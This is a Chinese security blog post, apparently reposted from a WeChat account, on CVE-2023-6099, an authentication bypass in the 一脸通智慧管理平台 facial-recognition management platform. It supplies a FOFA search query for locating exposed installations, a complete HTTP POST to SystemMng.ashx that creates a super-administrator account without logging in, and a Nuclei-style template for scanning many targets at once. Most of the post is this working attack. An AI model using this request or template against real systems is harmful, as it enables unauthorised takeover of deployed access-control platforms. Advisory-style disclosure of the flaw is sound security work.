一脸通智慧管理平台权限绕过漏洞

admin 2024年1月14日21:08:31评论55 views字数 1152阅读3分50秒阅读模式

一脸通智慧管理平台权限绕过漏洞

message

一脸通智慧管理平台权限绕过漏洞

  一脸通智慧管理平台1.0.55.0.0.1及其以下版本SystemMng.ashx接口处存在权限绕过漏洞,导致特权管理不当,未经身份认证的攻击者可以通过此漏洞创建超级管理员账户。

Vulnerability recurrence

一脸通智慧管理平台权限绕过漏洞

1.使用以下fofa语句进行资产收集,确认测试目标

title="欢迎使用脸爱云 一脸通智慧管理平台"

2.用burp抓包向网站发送如下数据包

POST /SystemMng.ashx HTTP/1.1Host: User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeAccept-Language: enContent-Length: 174operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

一脸通智慧管理平台权限绕过漏洞

3.响应200即成功创建账号为数据包内容

登陆后台可以看到自己创建的账号拥有管理员权限

一脸通智慧管理平台权限绕过漏洞

Batch script

一脸通智慧管理平台权限绕过漏洞
id: CVE-2023-6099info:  name: 一脸通智慧管理平台权限绕过漏洞  author: nihao  severity: high  description: '脸爱云一脸通智慧管理平台'  tags: 2023  metadata:    max-request: 3    fofa-query: title="欢迎使用脸爱云 一脸通智慧管理平台"    verified: truehttp:  - method: POST    path:      - "{{BaseURL}}/SystemMng.ashx"    headers:      Accept-Encoding: gzip, deflate      Accept-Language: en    body: "operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators"    matchers:      - type: dsl        dsl:          - "status_code == 200"

        

原文始发于微信公众号(揽月安全团队):一脸通智慧管理平台权限绕过漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月14日21:08:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一脸通智慧管理平台权限绕过漏洞http://cn-sec.com/archives/2386231.html

发表评论

匿名网友 填写信息